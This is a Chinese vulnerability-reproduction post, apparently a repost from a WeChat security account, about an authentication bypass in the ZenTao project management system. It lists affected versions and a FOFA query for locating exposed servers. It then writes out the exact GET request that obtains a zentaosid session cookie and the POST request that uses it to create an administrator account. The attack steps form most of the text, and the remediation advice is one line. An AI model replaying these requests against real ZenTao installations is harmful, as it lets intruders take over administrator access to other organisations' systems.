免责声明:文章中内容来源于互联网,涉及的所有内容仅供安全研究与教学之用,读者将其信息做其他用途而造成的任何直接或者间接的后果及损失由用户承担全部法律及连带责任。文章作者不承担任何法律及连带责任!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。
0x00.产品介绍
禅道项目管理系统(以下简称禅道系统)是一个开源的项目管理软件,专门设计用于敏捷开发,提供了需求管理、任务管理、缺陷跟踪、测试管理和项目绩效等功能,帮助团队更高效地进行项目规划和执行。
![禅道项目管理系统身份认证绕过[漏洞复现]](http://cn-sec.com/wp-content/uploads/2024/04/3-1714273560.png "禅道项目管理系统身份认证绕过[漏洞复现]")
0x01.影响范围
v16.x <= 禅道 < v18.12 (开源版)v6.x <= 禅道 < v8.12 (企业版)v3.x <= 禅道 < v4.12 (旗舰版)
0x02.漏洞概述
禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统
0x03.漏洞复现
FOFA: app="易软天创-禅道系统"请求目标如下,查看返回包是否具有zentaosid
GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1Host: you-ip
![禅道项目管理系统身份认证绕过[漏洞复现]](http://cn-sec.com/wp-content/uploads/2024/04/0-1714273561.png "禅道项目管理系统身份认证绕过[漏洞复现]")
获取到zentaosid后请求如下,进行添加用户操作
POST /zentao/api.php/v1/users HTTP/1.1Cookie: zentaosid=xxxxxxxxxxHost: you-ip{"account": "qwer123", "password": "admin!11", "realname": "qwer123", "role": "top", "group": "1"}
添加用户后直接登录即可
0x04.修复建议
厂商已提供漏洞修补方案,请关注厂商主页及时更新
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
遵守网络安全法,请勿用于非法入侵,仅供学习
原文始发于微信公众号(深白网安):禅道项目管理系统身份认证绕过[漏洞复现]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论